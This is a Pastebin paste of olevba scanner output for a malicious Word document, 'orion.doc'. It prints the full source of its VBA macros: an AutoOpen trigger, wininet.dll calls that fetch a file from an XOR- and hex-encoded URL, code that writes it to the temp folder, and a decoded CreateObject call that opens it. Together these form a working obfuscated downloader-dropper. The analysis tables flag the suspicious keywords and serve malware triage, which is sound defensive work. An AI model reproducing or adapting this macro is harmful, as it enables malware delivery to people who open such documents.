Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- orion.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: orion.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: orion.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub InIn()
- CALTHA
- End Sub
- Sub autoopen()
- InIn
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Const C1C1C1A = "BRITTANY"
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- C1C1C1 Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- C2C2C2 Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
- Public _
- Declare _
- PtrSafe _
- Function _
- C3C3C3 Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- C4C4C4 Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
- #Else
- Public Declare Function C1C1C1 Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
- Public Declare Function C2C2C2 Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
- Public Declare Function C3C3C3 Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- Public Declare Function C4C4C4 Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
- #End If
- Private Const BRANDI = 8162
- Private Const BRANDY As String = "HAZ"
- Private Const BREANA = 1
- Private Const BREDA = &H4000000
- Public Function C16C16C16 _
- (ByVal BREE As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim BRETT As LongPtr, BRIANNA As LongPtr
- #Else
- Dim BRETT As Long, BRIANNA As Long
- #End If
- Dim BRIAR As Long
- Dim C33C33C33 As String * BRANDI, BRIELLE As String
- Dim BRIER As Integer, BRIONY As Double
- BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0)
- If BRETT = 0 Then
- Exit Function
- End If
- Dim FiGaMan As Boolean
- If BRITANNIA(BRIANNA, BRETT) Then
- End If
- If BRIANNA = 0 Then
- BRIONY = 0
- Else
- C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
- BRIELLE = C33C33C33
- Do While BRIAR <> 0
- C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
- Dim BRITT As Long
- For BRITT = 6 To 8
- If BRITT = 38 Then End
- Next BRITT
- BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR)
- Loop
- BRIONY = Len(BRIELLE): BRIER = FreeFile
- Open BREE _
- For Binary Access Write _
- Lock Write _
- As #BRIER
- Put #BRIER, _
- , BRIELLE
- Dim BRITTA As Double
- For BRITTA = 2 To 3
- If BRITTA = 37 Then End
- Next BRITTA
- Close #BRIER
- End If
- C1C1C1 BRIANNA
- C1C1C1 BRETT
- BRIELLE = ""
- If BRIONY Then
- C16C16C16 = True
- End If
- End Function
- Public Function CANDICE(CANDIDA As String) As Integer
- CANDICE = Len(CANDIDA)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String
- Dim CAMILLE As Integer
- Dim CAMMIE As Integer
- Dim CAMRYN As Double
- For CAMRYN = 1 To 3
- If CAMRYN = 32 Then End
- Next CAMRYN
- Dim CANDACE As Long
- Dim CANDI As String
- For CANDACE = 1 _
- To _
- ( _
- CANDICE _
- (CAMILLA) _
- / 2)
- CAMILLE = Val("&H" & _
- (Mid$(CAMILLA, _
- (2 * CANDACE) - 1, 2)))
- CAMMIE = Asc(Mid$(CAMERON, _
- ((CANDACE Mod Len(CAMERON)) + 1), 1))
- CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
- Next CANDACE
- C8C8C8 = CANDI
- End Function
- Public Function C21C21C21() As Object
- Dim C22C22C22 As String
- C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
- Set C21C21C21 = CreateObject(C22C22C22)
- End Function
- Sub CALTHA()
- Dim CAMELLIA As Long
- Dim CANDIS As Double
- For CANDIS = 44 To 46
- If CANDIS = 32 Then End
- Next CANDIS
- CAMELLIA = 89
- CALANTHA (CAMELLIA)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D"
- Public Const C19C19C19 = "6850770C1D264C56"
- Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51"
- Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747"
- Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43"
- Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
- If CAILEIGH.FileExists(CAILYN) Then
- CADY = True
- Else
- CADY = False
- End If
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
- #Else
- Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
- #End If
- Dim CALLIDORA As String
- CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
- CALIDA _
- = C4C4C4 _
- ( _
- CALLA, _
- CALLIDORA, vbNullString, _
- 0, _
- BREDA, 0)
- BRITANNIA = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO M.bas
- in file: orion.doc - OLE stream: u'Macros/VBA/M'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
- Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
- End Function
- Sub CALANTHA(CALEIGH As Long)
- C25C25C25 ("CACACARDRDRDRD")
- End Sub
- Public Function C25C25C25(C24C24C24 As String)
- C6C6C6
- End Function
- Public Function C6C6C6()
- Dim C7C7C7 As Object
- Set C7C7C7 = C21C21C21
- Dim C11C11C11 As Object
- Set C11C11C11 = C5C5C5(C7C7C7)
- Dim C15C15C15
- Dim C12C12C12
- C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
- C15C15C15 = C11C11C11 & C12C12C12
- If CADY(C7C7C7, C15C15C15) Then
- C7C7C7. _
- DeleteFile C15C15C15
- End If
- If C16C16C16(C15C15C15) Then
- End If
- If CADY(C7C7C7, C15C15C15) Then
- End If
- Dim C17C17C17
- Set C17C17C17 = CreateObject _
- (C8C8C8 _
- (C9C9C9, C18C18C18))
- C17C17C17.Open C15C15C15
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: orion.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement